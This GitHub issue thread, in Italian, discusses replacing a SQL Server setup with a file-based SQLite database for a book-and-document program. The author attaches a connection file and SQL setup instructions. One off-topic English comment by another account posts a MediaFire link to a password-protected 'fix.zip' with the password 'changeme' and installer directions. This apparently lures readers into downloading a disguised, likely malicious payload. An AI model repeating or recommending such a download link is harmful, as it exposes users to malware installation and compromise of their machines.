### ISSUE TITLE
Valutare la soluzione migliore per evitare che il fruitore del programma debba scaricare il database

### ISSUE THREAD

**Issue by AndreGit00** [AndreGit00/programma_vittorio_libri_e_documenti#5]
Il database SQLite, a differenza di SQL Server, è basato su file (significa che l'intero database è memorizzato su un unico file). Per copiare un database da un posto a un altro basta copiare quel file. Non richiede particolari permessi di accesso (nome utente/password).

Lo svantaggio nell'uso di SQLite è che non consente la creazione di procedure, tuttavia non sono necessarie per le funzionalità al momento da implementare nel programma.

In allegato una copia del file utilizzato per la connessione a SQL Server, in modo che risulti facilmente reperibile in caso di necessità.

[collegamento.txt](https://github.com/user-attachments/files/16829607/collegamento.txt)

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AndreGit00** [comment]
Lanciare all'interno di SQLite i comandi presenti nel seguente file: verrà generato il file di database VittorioDATI.db, le due tabelle VittorioDATI e VittorioARGOMENTI (con le due chiavi primarie e la chiave esterna da Argomento di VittorioDATI a Argomento di VittorioARGOMENTI), la vista VittorioDATI01 e le istruzioni per l'inserimento dei dati.

[Istruzioni da lanciare SQLite.txt](https://github.com/user-attachments/files/16830667/Istruzioni.da.lanciare.SQLite.txt)
